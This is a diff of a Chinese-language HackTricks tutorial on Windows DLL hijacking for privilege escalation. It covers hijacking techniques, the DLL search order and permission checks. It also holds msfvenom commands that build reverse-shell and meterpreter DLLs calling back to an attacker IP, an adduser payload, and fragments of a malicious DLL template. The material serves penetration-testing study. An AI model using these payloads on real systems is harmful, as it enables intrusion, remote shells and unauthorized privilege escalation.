+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
+{% endhint %}
-**漏洞赏金提示**:**注册**Intigriti,这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,开始赚取高达**$100,000**的赏金:[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)。
+**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 基本信息
-DLL劫持涉及操纵受信任的应用程序以加载恶意DLL。这个术语包括几种策略,如**DLL欺骗、注入和侧向加载**。主要用于代码执行、实现持久性,较少用于权限提升。尽管这里关注的是提升权限,但劫持的方法在不同目标间保持一致。
+DLL 劫持涉及操纵受信任的应用程序加载恶意 DLL。这个术语涵盖了几种战术,如 **DLL 欺骗、注入和侧加载**。它主要用于代码执行、实现持久性,以及较少见的权限提升。尽管这里重点关注提升,但劫持的方法在不同目标之间保持一致。
### 常见技术
-有几种方法可用于DLL劫持,每种方法的有效性取决于应用程序的DLL加载策略:
+用于 DLL 劫持的几种方法,每种方法的有效性取决于应用程序的 DLL 加载策略:
-1. **DLL替换**:用恶意DLL替换真实DLL,可选择使用DLL代理以保留原始DLL的功能。
-2. **DLL搜索顺序劫持**:将恶意DLL放在合法DLL之前的搜索路径中,利用应用程序的搜索模式。
-3. **虚拟DLL劫持**:为应用程序创建一个恶意DLL以加载,认为它是一个不存在的必需DLL。
-4. **DLL重定向**:修改搜索参数如`%PATH%`或`.exe.manifest` / `.exe.local`文件,将应用程序指向恶意DLL。
-5. **WinSxS DLL替换**:在WinSxS目录中用恶意对应物替换合法DLL,这种方法通常与DLL侧向加载相关联。
-6. **相对路径DLL劫持**:将恶意DLL放在用户可控制的目录中,与复制的应用程序一起,类似于二进制代理执行技术。
+1. **DLL 替换**:用恶意 DLL 替换真实 DLL,选择性地使用 DLL 代理以保留原始 DLL 的功能。
+2. **DLL 搜索顺序劫持**:将恶意 DLL 放置在合法 DLL 之前的搜索路径中,利用应用程序的搜索模式。
+3. **幻影 DLL 劫持**:创建一个恶意 DLL 供应用程序加载,认为它是一个不存在的必需 DLL。
+4. **DLL 重定向**:修改搜索参数,如 `%PATH%` 或 `.exe.manifest` / `.exe.local` 文件,以将应用程序指向恶意 DLL。
+5. **WinSxS DLL 替换**:在 WinSxS 目录中用恶意 DLL 替换合法 DLL,这种方法通常与 DLL 侧加载相关。
+6. **相对路径 DLL 劫持**:将恶意 DLL 放置在用户控制的目录中,与复制的应用程序一起,类似于二进制代理执行技术。
-## 查找缺失的DLL
+## 查找缺失的 DLL
-查找系统中缺失的DLL最常见的方法是从sysinternals运行[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon),**设置以下2个过滤器**:
+查找系统中缺失的 DLL 的最常见方法是运行 [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) 来自 sysinternals,**设置** **以下 2 个过滤器**:
.png>)
.png>)
-然后只显示**文件系统活动**:
+并仅显示 **文件系统活动**:
.png>)
-如果您正在**一般查找缺失的DLL**,可以让其运行一段时间。\
-如果您正在查找**特定可执行文件中的缺失DLL**,应设置**另一个过滤器,如“进程名称”“包含”“”,执行它,然后停止捕获事件**。
+如果您在寻找 **缺失的 DLL**,可以 **让它运行几秒钟**。\
+如果您在寻找 **特定可执行文件中的缺失 DLL**,则应设置 **另一个过滤器,如 "进程名称" "包含" "\",执行它,然后停止捕获事件**。
-## 利用缺失的DLL
+## 利用缺失的 DLL
-为了提升权限,我们最好的机会是能够**编写一个特权进程将尝试加载的DLL**,在某个**将被搜索的地方**。因此,我们将能够**在一个**比**原始DLL的文件夹**更早被搜索的文件夹**中编写**一个DLL(奇怪的情况),或者我们将能够**在某个将被搜索的文件夹中编写**一个DLL,而原始**DLL在任何文件夹中都不存在**。
+为了提升权限,我们最好的机会是能够 **编写一个特权进程将尝试加载的 DLL**,在某个 **将被搜索的地方**。因此,我们将能够 **在一个文件夹中写入** DLL,该文件夹 **在搜索 DLL 之前**,或者我们将能够 **在某个将被搜索的文件夹中写入**,而原始 **DLL 在任何文件夹中都不存在**。
-### DLL搜索顺序
+### DLL 搜索顺序
-**在**[**Microsoft文档**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **中,您可以找到DLL的加载方式。**
+**在** [**Microsoft 文档**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **中,您可以找到 DLL 的具体加载方式。**
-**Windows应用程序**通过遵循一组**预定义的搜索路径**来查找DLL,遵循特定的顺序。当有害DLL被策略性地放置在这些目录之一中时,DLL劫持的问题就会出现,确保它在真实DLL之前加载。防止这种情况发生的解决方案是确保应用程序在引用所需DLL时使用绝对路径。
+**Windows 应用程序** 按照一组 **预定义的搜索路径** 查找 DLL,遵循特定的顺序。DLL 劫持的问题出现在有害 DLL 被战略性地放置在这些目录之一时,确保它在真实 DLL 之前被加载。防止这种情况的解决方案是确保应用程序在引用所需 DLL 时使用绝对路径。
-您可以在下面看到**32位系统上的DLL搜索顺序**:
+您可以在 32 位系统上看到 **DLL 搜索顺序**:
1. 应用程序加载的目录。
-2. 系统目录。使用[**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya)函数获取此目录的路径。(_C:\Windows\System32_)
-3. 16位系统目录。没有函数获取此目录的路径,但会被搜索。(_C:\Windows\System_)
-4. Windows目录。使用[**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya)函数获取此目录的路径。(_C:\Windows_)
+2. 系统目录。使用 [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) 函数获取该目录的路径。(_C:\Windows\System32_)
+3. 16 位系统目录。没有函数获取该目录的路径,但会进行搜索。 (_C:\Windows\System_)
+4. Windows 目录。使用 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) 函数获取该目录的路径。(_C:\Windows_)
5. 当前目录。
-6. 列在PATH环境变量中的目录。请注意,这不包括由**App Paths**注册表键指定的每个应用程序路径。**App Paths**键在计算DLL搜索路径时不使用。
+6. 在 PATH 环境变量中列出的目录。请注意,这不包括 **App Paths** 注册表项指定的每个应用程序路径。计算 DLL 搜索路径时不使用 **App Paths** 键。
-这是启用**SafeDllSearchMode**的默认搜索顺序。当禁用此功能时,当前目录会升至第二位。要禁用此功能,请创建**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**注册表值,并将其设置为0(默认为启用)。
+这是 **启用 SafeDllSearchMode** 的 **默认** 搜索顺序。当禁用时,当前目录提升到第二位。要禁用此功能,请创建 **HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** 注册表值并将其设置为 0(默认启用)。
-如果使用[**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa)函数调用**LOAD\_WITH\_ALTERED\_SEARCH\_PATH**,搜索将从**LoadLibraryEx**正在加载的可执行模块的目录开始。
+如果调用 [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) 函数时使用 **LOAD\_WITH\_ALTERED\_SEARCH\_PATH**,搜索将从 **LoadLibraryEx** 正在加载的可执行模块的目录开始。
-最后,请注意**DLL可以加载指示绝对路径而不仅仅是名称**。在这种情况下,该DLL**只会在该路径中搜索**(如果DLL有任何依赖项,它们将按名称搜索)。
+最后,请注意 **DLL 可以通过指示绝对路径而不是仅仅是名称来加载**。在这种情况下,该 DLL **只会在该路径中被搜索**(如果 DLL 有任何依赖项,它们将被视为仅按名称加载进行搜索)。
-还有其他改变搜索顺序的方法,但我不会在这里解释。
-#### Windows文档中关于DLL搜索顺序的异常情况
+还有其他方法可以更改搜索顺序,但我在这里不打算解释它们。
-Windows文档中指出了标准DLL搜索顺序的某些异常情况:
+#### Windows 文档中的 DLL 搜索顺序例外
-- 当遇到一个与内存中已加载的DLL同名的DLL时,系统会绕过通常的搜索顺序。相反,它会在默认使用内存中的DLL之前,执行重定向和清单检查。在这种情况下,系统不会搜索该DLL。
-- 如果DLL被识别为当前Windows版本的已知DLL,则系统将使用其版本的已知DLL及其任何依赖的DLL,跳过搜索过程。注册表键HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs保存了这些已知DLL的列表。
-- 如果DLL有依赖项,系统将搜索这些依赖DLL,就好像它们只被其模块名称指示一样,而不管最初的DLL是通过完整路径识别的。
+Windows 文档中指出了标准 DLL 搜索顺序的某些例外:
+
+* 当遇到 **与内存中已加载的 DLL 同名的 DLL** 时,系统会绕过通常的搜索。相反,它会在默认使用内存中已加载的 DLL 之前执行重定向和清单检查。**在这种情况下,系统不会进行 DLL 搜索**。
+* 在 DLL 被识别为当前 Windows 版本的 **已知 DLL** 的情况下,系统将使用其版本的已知 DLL 及其任何依赖 DLL,**跳过搜索过程**。注册表项 **HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** 保存这些已知 DLL 的列表。
+* 如果 **DLL 有依赖项**,则对这些依赖 DLL 的搜索将像仅通过其 **模块名称** 指示一样进行,而不管初始 DLL 是否通过完整路径识别。
### 提升权限
**要求**:
-- 确定一个将在**不同权限**下运行或将要运行的进程(水平或横向移动),该进程**缺少一个DLL**。
-- 确保**具有写入访问权限**,以便在**搜索DLL**的**任何目录**中使用。这个位置可能是可执行文件的目录或系统路径中的一个目录。
+* 确定一个在 **不同权限** 下运行或将要运行的进程(水平或横向移动),该进程 **缺少 DLL**。
+* 确保在 **DLL** 将被 **搜索的** 任何 **目录** 中有 **写入权限**。此位置可能是可执行文件的目录或系统路径中的目录。
-是的,这些要求很难找到,因为**默认情况下很难找到一个缺少DLL的特权可执行文件**,而且**更难以在系统路径文件夹中具有写入权限**(默认情况下无法)。但是,在配置错误的环境中,这是可能的。\
-如果你很幸运,发现自己符合要求,你可以查看[UACME](https://github.com/hfiref0x/UACME)项目。即使该项目的**主要目标是绕过UAC**,你可能会在那里找到一个用于你所使用的Windows版本的DLL劫持的PoC(可能只需更改具有写入权限的文件夹的路径)。
+是的,要求很难找到,因为 **默认情况下,找不到缺少 DLL 的特权可执行文件是有点奇怪**,而且在系统路径文件夹中拥有写入权限 **更奇怪**(默认情况下您无法做到)。但是,在配置错误的环境中,这是可能的。\
+如果您运气好,满足要求,您可以查看 [UACME](https://github.com/hfiref0x/UACME) 项目。即使 **该项目的主要目标是绕过 UAC**,您也可能会在那里找到一个 Windows 版本的 DLL 劫持的 **PoC**(可能只需更改您有写入权限的文件夹的路径)。
-请注意,你可以通过以下方式**检查文件夹中的权限**:
+请注意,您可以通过以下方式 **检查文件夹中的权限**:
```bash
accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"
```
-并**检查路径内所有文件夹的权限**:
+并**检查PATH中所有文件夹的权限**:
```bash
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
```
-您还可以使用以下命令检查可执行文件的导入项和 DLL 的导出项:
+您还可以使用以下命令检查可执行文件的导入和 DLL 的导出:
```c
dumpbin /imports C:\path\Tools\putty\Putty.exe
dumpbin /export /path/file.dll
```
-要了解如何**滥用Dll劫持以提升权限**并具有在**系统路径文件夹中写入权限**的完整指南,请查看:
+对于如何**利用Dll劫持提升权限**的完整指南,检查具有写入**系统路径文件夹**权限的内容:
{% content-ref url="dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md" %}
[writable-sys-path-+dll-hijacking-privesc.md](dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md)
@@ -116,39 +118,39 @@ dumpbin /export /path/file.dll
### 自动化工具
-[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)将检查您是否具有对系统路径中任何文件夹的写入权限。\
-其他有趣的自动化工具来发现此漏洞是**PowerSploit函数**:_Find-ProcessDLLHijack_、_Find-PathDLLHijack_和_Write-HijackDll_。
+[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)将检查您是否在系统路径中的任何文件夹上具有写入权限。\
+其他发现此漏洞的有趣自动化工具包括**PowerSploit函数**:_Find-ProcessDLLHijack_,_Find-PathDLLHijack_和_Write-HijackDll_。
### 示例
-如果发现可利用的情况,成功利用的一个最重要的事情是**创建一个至少导出可执行文件将从中导入的所有函数的dll**。无论如何,请注意,Dll劫持很方便,可以从中间完整性级别升级到高级**(绕过UAC)**或从**高完整性升级到SYSTEM**。您可以在此dll劫持研究中找到一个**如何创建有效dll**的示例,重点是用于执行的dll劫持:[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
-此外,在**下一部分**中,您可以找到一些**基本dll代码**,这些代码可能对**模板**或创建具有**不需要导出的函数的dll**有用。
+如果您发现一个可利用的场景,成功利用它的最重要的事情之一是**创建一个导出至少所有可执行文件将从中导入的函数的dll**。无论如何,请注意,Dll劫持在[**从中等完整性级别提升到高完整性(绕过UAC)**](../authentication-credentials-uac-and-efs.md#uac)或从[**高完整性提升到SYSTEM**](./#from-high-integrity-to-system)**时非常有用。**您可以在这个专注于执行的dll劫持研究中找到**如何创建有效dll的示例:[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
+此外,在**下一节**中,您可以找到一些**基本dll代码**,这些代码可能作为**模板**或用于创建**导出非必需函数的dll**。
-## **创建和编译Dlls**
+## **创建和编译Dll**
### **Dll代理**
-基本上,**Dll代理**是一个能够**在加载时执行您的恶意代码**,同时也能够**公开**并**按照预期工作**的**Dll**,通过**将所有调用中继到真实库**。
+基本上,**Dll代理**是一个能够**在加载时执行您的恶意代码**的Dll,同时也能**暴露**并**按预期工作**,通过**将所有调用转发到真实库**。
-使用工具[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)或[**Spartacus**](https://github.com/Accenture/Spartacus),您实际上可以**指定一个可执行文件并选择要代理的库**,然后**生成一个代理dll**,或者**指定Dll**并**生成一个代理dll**。
+使用工具[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)或[**Spartacus**](https://github.com/Accenture/Spartacus),您可以**指定一个可执行文件并选择要代理的库**,并**生成一个代理dll**,或**指定Dll并生成一个代理dll**。
### **Meterpreter**
-**获取反向shell(x64):**
+**获取反向shell (x64):**
```bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
```
-**获取一个 Meterpreter(x86):**
+**获取一个 meterpreter (x86):**
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
```
-**创建一个用户(x86 我没有看到 x64 版本):**
+**创建用户 (x86 我没有看到 x64 版本):**
```
msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
```
### 你自己的
-请注意,在几种情况下,您编译的 DLL 必须**导出多个函数**,这些函数将由受害进程加载,如果这些函数不存在,**二进制文件将无法加载**它们,**利用将失败**。
+注意,在多个情况下,您编译的 Dll 必须 **导出多个函数**,这些函数将被受害者进程加载,如果这些函数不存在,**二进制文件将无法加载**它们,**攻击将失败**。
```c
// Tested in Win10
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
@@ -229,27 +231,28 @@ break;
return TRUE;
}
```
-## 参考资料
+## 参考文献
* [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
* [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
-**漏洞悬赏提示**: **注册** Intigriti,一个由黑客创建的高级**漏洞悬赏平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的悬赏金!
+**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
+{% hint style="success" %}
+学习与实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习与实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!
+支持 HackTricks
-支持 HackTricks 的其他方式:
-
-* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
-* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
-* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index 7cfacbf42..903b00c12 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -1,114 +1,116 @@
-# DLL劫持
+# Dll Hijacking
+
+{% hint style="success" %}
+学习和实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+学习和实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
+支持 HackTricks
-支持HackTricks的其他方式:
-
-* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
-* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
+* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
-**漏洞赏金提示**:**注册**Intigriti,这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,开始赚取高达**$100,000**的赏金:[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)。
+**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 基本信息
-DLL劫持涉及操纵受信任的应用程序以加载恶意DLL。此术语涵盖了几种策略,如**DLL欺骗、注入和侧向加载**。主要用于代码执行、实现持久性,较少用于权限提升。尽管这里关注的是提升权限,但劫持方法在不同目标中保持一致。
+DLL 劫持涉及操纵受信任的应用程序加载恶意 DLL。这个术语涵盖了几种策略,如 **DLL 欺骗、注入和侧加载**。它主要用于代码执行、实现持久性,以及较少见的权限提升。尽管这里重点关注提升,但劫持的方法在不同目标间保持一致。
### 常见技术
-DLL劫持采用多种方法,每种方法的有效性取决于应用程序的DLL加载策略:
+用于 DLL 劫持的几种方法,每种方法的有效性取决于应用程序的 DLL 加载策略:
-1. **DLL替换**:用恶意DLL替换真实DLL,可选择使用DLL代理以保留原始DLL的功能。
-2. **DLL搜索顺序劫持**:将恶意DLL放置在合法DLL之前的搜索路径中,利用应用程序的搜索模式。
-3. **虚拟DLL劫持**:为应用程序创建一个恶意DLL以加载,认为它是一个不存在的必需DLL。
-4. **DLL重定向**:修改搜索参数如`%PATH%`或`.exe.manifest` / `.exe.local`文件,将应用程序定向到恶意DLL。
-5. **WinSxS DLL替换**:在WinSxS目录中用恶意对应物替换合法DLL,这种方法通常与DLL侧向加载相关联。
-6. **相对路径DLL劫持**:将恶意DLL放置在用户可控目录中与复制的应用程序一起,类似于二进制代理执行技术。
+1. **DLL 替换**:用恶意 DLL 替换真实 DLL,选择性地使用 DLL 代理以保留原始 DLL 的功能。
+2. **DLL 搜索顺序劫持**:将恶意 DLL 放置在合法 DLL 之前的搜索路径中,利用应用程序的搜索模式。
+3. **幻影 DLL 劫持**:为应用程序创建一个恶意 DLL,使其认为这是一个不存在的必需 DLL。
+4. **DLL 重定向**:修改搜索参数,如 `%PATH%` 或 `.exe.manifest` / `.exe.local` 文件,以引导应用程序加载恶意 DLL。
+5. **WinSxS DLL 替换**:在 WinSxS 目录中用恶意 DLL 替换合法 DLL,这种方法通常与 DLL 侧加载相关。
+6. **相对路径 DLL 劫持**:将恶意 DLL 放置在用户控制的目录中,与复制的应用程序一起,类似于二进制代理执行技术。
-## 查找缺失的DLL
+## 查找缺失的 DLL
-查找系统中缺失的DLL最常见的方法是从sysinternals运行[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon),**设置以下2个过滤器**:
+查找系统中缺失的 DLL 的最常见方法是运行 [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon),**设置** **以下 2 个过滤器**:
.png>)
.png>)
-然后只显示**文件系统活动**:
+并仅显示 **文件系统活动**:
.png>)
-如果您正在**一般查找缺失的DLL**,可以让其运行一段时间。\
-如果您正在查找**特定可执行文件中的缺失DLL**,应设置**另一个过滤器,如“进程名称”“包含”“”,执行它,然后停止捕获事件**。
+如果您在寻找 **缺失的 DLL**,可以 **让它运行几秒钟**。\
+如果您在寻找 **特定可执行文件中的缺失 DLL**,则应设置 **另一个过滤器,如 "进程名称" "包含" "\",执行它,然后停止捕获事件**。
-## 利用缺失的DLL
+## 利用缺失的 DLL
-为了提升权限,我们最好的机会是能够**编写一个特权进程将尝试加载的DLL**,在某个**将被搜索的地方**。因此,我们将能够**在一个**比**原始DLL的文件夹**更早被搜索的文件夹**中编写**一个DLL(奇怪的情况),或者我们将能够**在某个将被搜索的文件夹中编写**一个DLL,而原始**DLL在任何文件夹中都不存在**。
+为了提升权限,我们最好的机会是能够 **编写一个特权进程将尝试加载的 DLL**,在 **将要搜索的某个位置**。因此,我们将能够 **在一个文件夹中写入** DLL,该文件夹 **在搜索 DLL 之前**,或者我们将能够 **在某个文件夹中写入**,该文件夹 **将要搜索 DLL**,而原始 **DLL 在任何文件夹中都不存在**。
-### DLL搜索顺序
+### DLL 搜索顺序
-**在**[**Microsoft文档**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **中,您可以找到DLL的加载方式。**
+**在** [**Microsoft 文档**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **中,您可以找到 DLL 的具体加载方式。**
-**Windows应用程序**通过遵循一组**预定义的搜索路径**来查找DLL,遵循特定的顺序。当有害DLL被策略性地放置在这些目录之一中,确保它在真实DLL之前加载时,DLL劫持问题就会出现。防止这种情况的解决方案是确保应用程序在引用所需DLL时使用绝对路径。
+**Windows 应用程序** 按照一组 **预定义的搜索路径** 查找 DLL,遵循特定的顺序。DLL 劫持的问题出现在有害 DLL 被战略性地放置在这些目录之一时,确保它在真实 DLL 之前被加载。防止这种情况的解决方案是确保应用程序在引用所需 DLL 时使用绝对路径。
-您可以在下面看到**32位系统上的DLL搜索顺序**:
+您可以在 32 位系统上看到 **DLL 搜索顺序**:
1. 应用程序加载的目录。
-2. 系统目录。使用[**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya)函数获取此目录的路径。(_C:\Windows\System32_)
-3. 16位系统目录。没有函数可以获取此目录的路径,但会被搜索。(_C:\Windows\System_)
-4. Windows目录。使用[**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya)函数获取此目录的路径。(_C:\Windows_)
+2. 系统目录。使用 [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) 函数获取该目录的路径。(_C:\Windows\System32_)
+3. 16 位系统目录。没有函数获取该目录的路径,但会进行搜索。 (_C:\Windows\System_)
+4. Windows 目录。使用 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) 函数获取该目录的路径。(_C:\Windows_)
5. 当前目录。
-6. 列在PATH环境变量中的目录。请注意,这不包括由**App Paths**注册表键指定的每个应用程序路径。**App Paths**键在计算DLL搜索路径时不使用。
+6. 在 PATH 环境变量中列出的目录。请注意,这不包括 **App Paths** 注册表项指定的每个应用程序路径。计算 DLL 搜索路径时不使用 **App Paths** 键。
-这是启用**SafeDllSearchMode**的**默认**搜索顺序。当禁用此功能时,当前目录会升至第二位。要禁用此功能,请创建**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**注册表值,并将其设置为0(默认为启用)。
+这是 **启用 SafeDllSearchMode** 的 **默认** 搜索顺序。当禁用时,当前目录提升到第二位。要禁用此功能,请创建 **HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** 注册表值并将其设置为 0(默认启用)。
-如果使用[**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa)函数调用**LOAD\_WITH\_ALTERED\_SEARCH\_PATH**,搜索将从**LoadLibraryEx**正在加载的可执行模块的目录开始。
+如果调用 [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) 函数时使用 **LOAD\_WITH\_ALTERED\_SEARCH\_PATH**,搜索将从 **LoadLibraryEx** 正在加载的可执行模块的目录开始。
-最后,请注意**DLL可以加载指示绝对路径而不仅仅是名称**。在这种情况下,该DLL**只会在该路径中搜索**(如果DLL有任何依赖项,它们将按名称搜索)。
+最后,请注意 **DLL 可以通过指示绝对路径而不是仅仅是名称来加载**。在这种情况下,该 DLL **只会在该路径中被搜索**(如果 DLL 有任何依赖项,它们将被视为仅按名称加载进行搜索)。
-还有其他改变搜索顺序的方法,但我不会在这里解释。
-#### Windows文档中关于DLL搜索顺序的异常情况
+还有其他方法可以更改搜索顺序,但我在这里不打算解释它们。
-Windows文档中指出了标准DLL搜索顺序的某些异常情况:
+#### Windows 文档中的 DLL 搜索顺序例外
-- 当遇到一个与内存中已加载的DLL同名的DLL时,系统会绕过通常的搜索顺序。相反,它会在默认使用内存中已加载的DLL之前,执行重定向和清单检查。在这种情况下,系统不会搜索该DLL。
